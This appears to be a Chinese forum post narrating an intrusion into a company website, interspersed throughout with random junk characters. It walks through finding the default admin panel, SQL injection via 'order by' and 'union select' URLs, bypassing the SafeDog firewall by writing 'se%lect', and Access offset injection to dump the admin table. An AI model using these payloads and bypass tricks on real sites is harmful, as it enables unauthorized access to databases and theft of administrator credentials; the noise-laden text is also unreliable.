打开网站,一个企业站。
* _; {. c6 n" e
; t8 K& H' I3 P4 U( T3 Q4 e% J+ j6 a
顺手加个admin
3 ^5 Y, R- J$ Q$ N7 b- @/ V) v' ^ Q5 j
- \7 D1 m# X8 w( x; h" I默认后台。8 r$ }4 H( l" O0 b6 H
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。* z# a. u* ?- f6 S+ U/ o
! E6 f1 z$ j& E6 B9 O- w3 H2 i4 m; y) F: D6 b2 I; r
. [0 A3 ] S9 B7 ~( N4 m
所以就不用御剑扫了,待会直接封IP。
% c; F! C z) a4 h( o2 v
8 X, D9 d) m- P. F( j, F用order by语句判断是否存在注入。 q# Q& W8 k! g! E/ r/ U) O
http://www.xxx.com /product_show.asp?id=997 order by 15 z8 ]# m, [, N- E( z
http://www.xxx.com /product_show.asp?id=997 order by 1008 `) {' x" u) l0 J2 e, R4 {
现在存在注入,经测试后发现是9个字段。) l: N# k: s: }: N# O
0 v* r$ {& f4 j接下来进行联合查询,猜是否存在admin表。2 _% C9 {0 x5 m/ {- M
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
U9 y/ G' m% l, Y) ~
/ d; |5 h9 p2 [" a) F: |8 p
# R f8 p) A" H/ e5 P* _9 d/ I
; s! ^+ p1 |2 J5 m; |. j' x0 F1 o9 W& `在select中间加个%,se%lect绕过安全狗。2 X- L# j2 v1 `, }5 l
! ~3 z" x& l7 k G7 a6 I3 ]. C
" ?4 |; g6 u- g+ @0 S: ~发现存在admin表,然后开始手工猜常用的字段。
; `4 \* V' t% x) I* B* i7 l; f; ?+ b纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
. P; m% W2 F0 d " H' z" L/ e% Q! z
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" I7 t! c; ]0 t, I+ h2 J L
# F# S. X% Y6 U, Q0 z
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。, J1 Q8 M$ E0 F/ T: M4 o
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin7 H) |1 B7 a2 {" B& G( ^
好了,敏感内容出显了。
8 C2 p4 N. g0 F+ l! B! q% _0 ]9 S' G: `# m0 l
1 n' P, x6 h' n/ o/ G5 g
, K, ~ J0 y+ G9 h |